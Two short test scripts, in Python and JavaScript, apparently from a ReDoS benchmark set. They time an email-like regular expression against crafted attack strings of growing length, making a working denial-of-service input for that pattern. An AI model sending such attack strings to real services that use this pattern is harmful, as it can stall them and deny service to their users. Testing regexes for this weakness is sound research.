File: regexlib/2021-5-15/python_re2_test_file/regexlib_3603.py
# 3603
# [\d+]{10}\@[\w]+\.?[\w]+?\.?[\w]+?\.?[\w+]{2,4}/i
# POLYNOMIAL
# nums:5
# POLYNOMIAL AttackString:""+"1111111111@1"*80000+"!1 _SLQ_2"

import re2 as re
from time import perf_counter

regex = """[\d+]{10}\@[\w]+\.?[\w]+?\.?[\w]+?\.?[\w+]{2,4}/i"""
REGEX = re.compile(regex)
for i in range(0, 150000):
    ATTACK = "" + "1111111111@1" * i * 10000 + "!1 _SLQ_2"
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    m = REGEX.search(ATTACK)
    # m = REGEX.match(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{i *10000}: took {DURATION} seconds!")

File: regexlib/javascript_test_file/regexlib_3603.js
/* 3603
 * [\d+]{10}\@[\w]+\.?[\w]+?\.?[\w]+?\.?[\w+]{2,4}/i
 * POLYNOMIAL
 * nums:3
 * POLYNOMIAL AttackString:""+"1111111111@1"*80000+"!1 _SLQ_2"
 */
var REGEX = new RegExp("[\d+]{10}\@[\w]+\.?[\w]+?\.?[\w]+?\.?[\w+]{2,4}/i")
for(var i = 1; i <= 5000000; i++) {
    var time = Date.now();
    var attack_str = '' + '1111111111@1'.repeat(i*10000) + '!1 _SLQ_2'
    REGEX.exec(attack_str)
    // REGEX.test(attack_str);
    // attack_str.search(REGEX)
    // attack_str.match(REGEX)
    var time_cost = Date.now() - time;
    console.log(i * 10000 + ": " + time_cost+" ms")
}